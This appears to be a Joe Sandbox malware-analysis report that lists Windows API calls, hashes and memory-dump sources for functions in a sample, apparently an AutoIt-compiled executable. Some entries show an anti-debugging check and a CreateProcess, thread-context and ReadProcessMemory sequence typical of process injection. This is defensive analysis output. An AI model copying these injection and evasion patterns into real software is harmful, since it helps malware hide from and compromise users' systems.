Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: c4f8b3316d91d07a06e822b250bbe724a3b073cde565ae2cd6c635469370c708
Instruction ID: 019ff90dde9ffecada3605983855855f0aa6d6924971203d5c455676c2172c26
Opcode Fuzzy Hash: c4f8b3316d91d07a06e822b250bbe724a3b073cde565ae2cd6c635469370c708
Instruction Fuzzy Hash: 8031A4B2714706AFDB04EF68C8D1E69B3A9FF483207158629E519CB291EB34E910DB90

Function 00F947D0 Relevance: 3.1, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

IsThemeActive.UXTHEME ref: 00F94834

Part of subcall function 00FB336C: __lock.LIBCMT ref: 00FB3372
Part of subcall function 00FB336C: DecodePointer.KERNEL32(00000001,?,00F94849,00FE7C74), ref: 00FB337E
Part of subcall function 00FB336C: EncodePointer.KERNEL32(?,?,00F94849,00FE7C74), ref: 00FB3389

Part of subcall function 00F948FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00F94915
Part of subcall function 00F948FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00F9492A

Part of subcall function 00F93B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00F93B68
Part of subcall function 00F93B3A: IsDebuggerPresent.KERNEL32 ref: 00F93B7A
Part of subcall function 00F93B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,010552F8,010552E0,?,?), ref: 00F93BEB
Part of subcall function 00F93B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 00F93C6F

SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00F94874

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
String ID:
API String ID: 1438897964-0
Opcode ID: 94edcc0d5a5ee3e84c50ce412e861928382455acefde49d197355449d1a9a565
Instruction ID: e65478de1e39bc15bbe45d8bf0e75928e507973df03c9b2143eaf2c95b7902d2
Opcode Fuzzy Hash: 94edcc0d5a5ee3e84c50ce412e861928382455acefde49d197355449d1a9a565
Instruction Fuzzy Hash: E8119D719183419BDB20EF29DC0590BBFE8FF99750F50451EF084832A1DBBA9549DB92

Function 00FB0DB6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00FB571C: __FF_MSGBANNER.LIBCMT ref: 00FB5733
Part of subcall function 00FB571C: __NMSG_WRITE.LIBCMT ref: 00FB573A
Part of subcall function 00FB571C: RtlAllocateHeap.NTDLL(01B20000,00000000,00000001,00000000,?,?,?,00FB0DD3,?), ref: 00FB575F

std::exception::exception.LIBCMT ref: 00FB0DEC
__CxxThrowException@8.LIBCMT ref: 00FB0E01

Part of subcall function 00FB859B: RaiseException.KERNEL32(?,?,?,01049E78,00000000,?,?,?,?,00FB0E06,?,01049E78,?,00000001), ref: 00FB85F0

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
String ID:
API String ID: 3902256705-0
Opcode ID: b04e1948d6128ba2ae9b90c3fef4bbefb6d4b4cf125ddab4d1579bfc3ab37a86
Instruction ID: 9f71618f16fb4bb60447a1611e29bae4e790e1d06409fbaee8a92c9fa14cfc0d
Opcode Fuzzy Hash: b04e1948d6128ba2ae9b90c3fef4bbefb6d4b4cf125ddab4d1579bfc3ab37a86
Instruction Fuzzy Hash: 8FF0C83190031EA6CB24FAD7EC05ADF77AC9F05361F500469FD4496581DF74DA81EAD1

Function 00FB53A6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00FB8B28: __getptd_noexit.LIBCMT ref: 00FB8B28

__lock_file.LIBCMT ref: 00FB53EB

Part of subcall function 00FB6C11: __lock.LIBCMT ref: 00FB6C34

__fclose_nolock.LIBCMT ref: 00FB53F6

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: e54cd29fb37ac70eea732d51374d90da582ce3cddee2e9ecf68c6d057c22c313
Instruction ID: b3a78f55f07fd84e5286c734c5fbccba74cf03fa985fedb69bedc16999c8a700
Opcode Fuzzy Hash: e54cd29fb37ac70eea732d51374d90da582ce3cddee2e9ecf68c6d057c22c313
Instruction Fuzzy Hash: E5F09671900A04DADB20AF779C017ED7AE56F81BB5F288109A464AB2C1CBBC8942BF51

Function 01BD8DFD Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 01BD95BB
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01BD9651
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01BD9673

Memory Dump Source

Source File: 00000000.00000002.1488564818.0000000001BD7000.00000040.00000020.00020000.00000000.sdmp, Offset: 01BD7000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1bd7000_bkTW1FbgHN.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: 6ff7500a3617197a005732162d507dd4d37460c8dcbf147a4ae2be43d63b6423
Instruction ID: b5bb4ab3388532f0008d3db39f2779cad1aaabefcbc8e158ce8e63f48a3979dd
Opcode Fuzzy Hash: 6ff7500a3617197a005732162d507dd4d37460c8dcbf147a4ae2be43d63b6423
Instruction Fuzzy Hash: C012DE24E24658C6EB24DF64D8507DEB232EF68300F1091E9910DEB7A5E77A4F81CF5A

Function 00F9F290 Relevance: 1.7, APIs: 1, Instructions: 185COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e88c7281ebb9b7dcc2bf41ed6dcd8d0b5634d661918477eef2bdae8cfcd65bc4
Instruction ID: 71e030d8795c4155710e0728da9c0768336515a877e81965908dcb326cc4a550
Opcode Fuzzy Hash: e88c7281ebb9b7dcc2bf41ed6dcd8d0b5634d661918477eef2bdae8cfcd65bc4
Instruction Fuzzy Hash: BF617A71A0420A9FEF10DF68C881BAAB7E5EF44314F14846EE906D7291DB79ED48EB50

Function 00FB0C08 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 00FB0CB7

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: 0c70f8a1212a049b1ef5c652a719371ae5c3c9185729f6d582c92634c9239685
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: 5331D9B5A001059FC718DF5AC484AAAFBA5FB59310B648795E40ACB351DB31EDC1EFC0

Function 00FCFCAC Relevance: 1.6, APIs: 1, Instructions: 88COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00FCFCB7

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: d449f72c57d1c48ee6e46a304de900083c30bddf3be901796233b1970524be40
Instruction ID: 4f20e816a9d34e7c4fd8eccba37b70a5053e88e7d9ad682d85383f7f5349c426
Opcode Fuzzy Hash: d449f72c57d1c48ee6e46a304de900083c30bddf3be901796233b1970524be40
Instruction Fuzzy Hash: 18410874904341CFEB14DF18C484B1ABBE1BF45314F09889CE8998B362C735E845DF92

Function 00F97B53 Relevance: 1.6, APIs: 1, Instructions: 84COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00F97BB3

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: d32823ac2671e6b8dafdc8ffba856f137affad222c25dbdaef5c569543523bd1
Instruction ID: b507b567f6f8d33a5df2ad6fdaa0062d2b1417e98d4f667e1156e544d9c119e7
Opcode Fuzzy Hash: d32823ac2671e6b8dafdc8ffba856f137affad222c25dbdaef5c569543523bd1
Instruction Fuzzy Hash: 1E213872A1470AEBDF249F16ED82BAE7BB4FB54350F20846DE485C5094EB31D190E705

Function 00FB06FE Relevance: 1.6, APIs: 1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25aca5201f14aa7f9276b2b245522c22aef7c229ef520d6bc427b361eae3eb74
Instruction ID: ae5facff06426e86ed270f1981f69a41640c7890534f2957ec7330a50ed8a89d
Opcode Fuzzy Hash: 25aca5201f14aa7f9276b2b245522c22aef7c229ef520d6bc427b361eae3eb74
Instruction Fuzzy Hash: 2E21C636009282AFE313973498829E7BF95DF83224B1884EEECC657866CA705847CB91

Function 00F94DDD Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00F94BB5: FreeLibrary.KERNEL32(00000000,?), ref: 00F94BEF

Part of subcall function 00FB525B: __wfsopen.LIBCMT ref: 00FB5266

LoadLibraryExW.KERNEL32(?,00000000,00000002,?,010552F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00F94E0F

Part of subcall function 00F94B6A: FreeLibrary.KERNEL32(00000000), ref: 00F94BA4

Part of subcall function 00F94C70: _memmove.LIBCMT ref: 00F94CBA

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: Library$Free$Load__wfsopen_memmove
String ID:
API String ID: 1396898556-0
Opcode ID: 3eb0f4322b3e0cc5308f0b16061e219acbf1fd0e69f922957ecc8cfe3bdda17e
Instruction ID: be18b1a874224796c23530eccb068f1ea1c7073a45c9c016d4f791d788ba2f32
Opcode Fuzzy Hash: 3eb0f4322b3e0cc5308f0b16061e219acbf1fd0e69f922957ecc8cfe3bdda17e
Instruction Fuzzy Hash: F2110632A00206ABEF14FF70CC52FAD77A8AF94710F10882DF541A7181DB79AE06BB50

Function 00FCFD85 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 00FCFD91

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: acbbdfb32fd45d51d810f651cf9d54f00b17b561cbac762acacedfbe37bb8dc6
Instruction ID: 5616f7f908b6b13761bf3429ab5e3a293c61a594c601d324346dc924978974dd
Opcode Fuzzy Hash: acbbdfb32fd45d51d810f651cf9d54f00b17b561cbac762acacedfbe37bb8dc6
Instruction Fuzzy Hash: A52113B4908302DFDB14DF64C844B1ABBE1BF88314F05896CE98A57722D735E809EB92

Function 00FB4863 Relevance: 1.5, APIs: 1, Instructions: 36COMMON

Download Yara Rule

APIs

__lock_file.LIBCMT ref: 00FB48A6

Part of subcall function 00FB8B28: __getptd_noexit.LIBCMT ref: 00FB8B28

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: __getptd_noexit__lock_file
String ID:
API String ID: 2597487223-0
Opcode ID: 67a3c6f3b8b16baf55024c7e27c7795bf6e6b1ad4d6f82f6cdbe97aaa5bf4b1b
Instruction ID: 45b9327290abb3244f620505614ed6b3ced9b9f94d05eeaa666acb0e86c7a2f6
Opcode Fuzzy Hash: 67a3c6f3b8b16baf55024c7e27c7795bf6e6b1ad4d6f82f6cdbe97aaa5bf4b1b
Instruction Fuzzy Hash: 66F0FF31900208ABDF11AFB2CD063EE36A5AF40326F148418B4209A182CB7CC952FF51

Function 00F94E4A Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,010552F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00F94E7E

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: d8a3761fa9aa3ce08b22aba1a5f45ccfdec4287c63588ea277ce04a027c20a83
Instruction ID: 74fc6f1a295f07ab6686748f318033e3f3cdd23beeca3dff1cc2b887100b6b0a
Opcode Fuzzy Hash: d8a3761fa9aa3ce08b22aba1a5f45ccfdec4287c63588ea277ce04a027c20a83
Instruction Fuzzy Hash: B4F03971901712CFEF34AF64E494C16BBE1BF243393248A3EE1D682610C776A885EF40

Function 00FB0791 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00FB07B0

Part of subcall function 00F97BCC: _memmove.LIBCMT ref: 00F97C06

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: LongNamePath_memmove
String ID:
API String ID: 2514874351-0
Opcode ID: 1a22dcff03a3ea6c6fec8934afdf26990aa43042ee9c33e8848fdcfb4f974d44
Instruction ID: b3b8bbcdbb2c84bc0a5ac3ef98f36c36eb6ec9b4db85424f563d63c6213a0f65
Opcode Fuzzy Hash: 1a22dcff03a3ea6c6fec8934afdf26990aa43042ee9c33e8848fdcfb4f974d44
Instruction Fuzzy Hash: 45E0863690422957C720A5589C06FEA779DDB896A0F0441B5FC08D7209D9699C908690

Function 00FB525B Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

__wfsopen.LIBCMT ref: 00FB5266

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: __wfsopen
String ID:
API String ID: 197181222-0
Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction ID: 5a9bf8b470b75ed488a3fb52de82c8f8663c4c4ea96519a19f4525d6f0398088
Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction Fuzzy Hash: C4B0927644020C77CE022A82EC02B893B199B42B64F408020FB0C18162A67BAA64AA89

Function 01BD9DFC Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 01BD9E11

Memory Dump Source

Source File: 00000000.00000002.1488564818.0000000001BD7000.00000040.00000020.00020000.00000000.sdmp, Offset: 01BD7000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1bd7000_bkTW1FbgHN.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
Instruction ID: 37bf762b20fe14c54ac75e067be3bbe4d612c5cb49198b52d1b35d5236d7f5b9
Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
Instruction Fuzzy Hash: A7E0BF7494010DEFDB04EFB4D5496DE7BB4EF04301F1005A1FD05D7681DB319E549A62

Function 01BD9E00 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 01BD9E11

Memory Dump Source

Source File: 00000000.00000002.1488564818.0000000001BD7000.00000040.00000020.00020000.00000000.sdmp, Offset: 01BD7000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1bd7000_bkTW1FbgHN.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction ID: efa6b943d6e3771d1cb26d7c7b62ca2ab04764906ec8059e4482da7933a401ae
Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction Fuzzy Hash: 33E0E67494010DDFDB00EFB4D54969E7FB4EF04301F1001A1FD01D2281D7319D509A62

Non-executed Functions

Function 0101CABC Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 632windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00F92612: GetWindowLongW.USER32(?,000000EB), ref: 00F92623

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0101CB37
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0101CB95
GetWindowLongW.USER32(?,000000F0), ref: 0101CBD6
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0101CC00
SendMessageW.USER32 ref: 0101CC29
_wcsncpy.LIBCMT ref: 0101CC95
GetKeyState.USER32(00000011), ref: 0101CCB6
GetKeyState.USER32(00000009), ref: 0101CCC3
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0101CCD9
GetKeyState.USER32(00000010), ref: 0101CCE3
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0101CD0C
SendMessageW.USER32 ref: 0101CD33
SendMessageW.USER32(?,00001030,?,0101B348), ref: 0101CE37
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0101CE4D
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0101CE60
SetCapture.USER32(?), ref: 0101CE69
ClientToScreen.USER32(?,?), ref: 0101CECE
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0101CEDB
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0101CEF5
ReleaseCapture.USER32 ref: 0101CF00
GetCursorPos.USER32(?), ref: 0101CF3A
ScreenToClient.USER32(?,?), ref: 0101CF47
SendMessageW.USER32(?,00001012,00000000,?), ref: 0101CFA3
SendMessageW.USER32 ref: 0101CFD1
SendMessageW.USER32(?,00001111,00000000,?), ref: 0101D00E
SendMessageW.USER32 ref: 0101D03D
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0101D05E
SendMessageW.USER32(?,0000110B,00000009,?), ref: 0101D06D
GetCursorPos.USER32(?), ref: 0101D08D
ScreenToClient.USER32(?,?), ref: 0101D09A
GetParent.USER32(?), ref: 0101D0BA
SendMessageW.USER32(?,00001012,00000000,?), ref: 0101D123
SendMessageW.USER32 ref: 0101D154
ClientToScreen.USER32(?,?), ref: 0101D1B2
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0101D1E2
SendMessageW.USER32(?,00001111,00000000,?), ref: 0101D20C
SendMessageW.USER32 ref: 0101D22F
ClientToScreen.USER32(?,?), ref: 0101D281
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0101D2B5

Part of subcall function 00F925DB: GetWindowLongW.USER32(?,000000EB), ref: 00F925EC

GetWindowLongW.USER32(?,000000F0), ref: 0101D351

Strings

F, xrefs: 0101D235
@GUI_DRAGID, xrefs: 0101CE9C

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
String ID: @GUI_DRAGID$F
API String ID: 3977979337-4164748364
Opcode ID: 012f77758d58a808364537e6da6bc87374d070f73fdbdf91c70c5c0e775e33fb
Instruction ID: aaacc1bd164890f22f864d93e9fbdf4ff2821c9183d77f3801f9781315457f25
